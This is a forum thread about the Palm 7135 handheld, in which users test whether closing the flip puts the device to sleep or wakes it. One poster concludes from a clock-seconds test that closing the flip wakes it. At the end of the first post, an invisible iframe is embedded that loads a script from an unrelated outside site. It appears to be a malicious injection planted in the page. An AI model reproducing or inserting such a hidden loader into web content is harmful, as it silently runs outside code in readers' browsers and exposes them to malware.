+ Reply to Thread

7135 flip like a fridge door

I wondered if the LCD turned off when the flip was closed, so I took a flashlight and watched the screen while i slowly closed the flip, and behold, the LCD went black along with the backlight shutoff.

I am wondering though, whether the Palm wakes up if you close the flip when it's already in sleep mode. I know the 6035 woke up if you closed the flip. Any ideas on how to test this? If it doesn't wake up, then it would save some battery to actually sleep it before closing the flip (since it still waits until the auto-off time before actually sleeping). If it does wake up, there's no point in sleeping it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Interesting stuff KLiuLess.
    iPhone therefore iAm.

Mod-Blog's SmartPhone Correspondent
    Just tried it. Slept the 7135 with a tap of the backlight button, closed flip slowly - it stayed slept. Then openned flip and it woke as normal.

Thanks for trying it... but I was really looking for something more difficult to test. When you close the clam, there's no way to actually "see" whether it wakes up, because the LCD will stay black.

What I'm looking for is an app that will make a sound when you launch it. So I can use the PowerButton hack to launch that app on wakeup, and see when the sound actually plays - on clam close or clam open.

The Palm indeed *does* wake up when you close the flip.
    If you want to see for yourself:

1. First check to see that my test is accurate:
    Open a clock app that shows seconds, like BigClock. Sleep the palm using the backlight button (with flip open), wait a few seconds, then wake it. You'll notice the seconds "jump" because they lagged behind when it was sleeping. Now try the same without sleeping the palm, but just closing the flip. You'll notice the seconds don't jump this time. So the palm doesn't sleep immediately when the flip is closed.

2. The flip test:
    With the same clock app running, sleep the palm, then close the flip and wait a few seconds. Open the flip and watch the seconds. They don't jump, because the action of closing the flip wakes up the palm.

The conclusion:
    It saves no energy (but wastes time) to sleep the palm before closing the flip.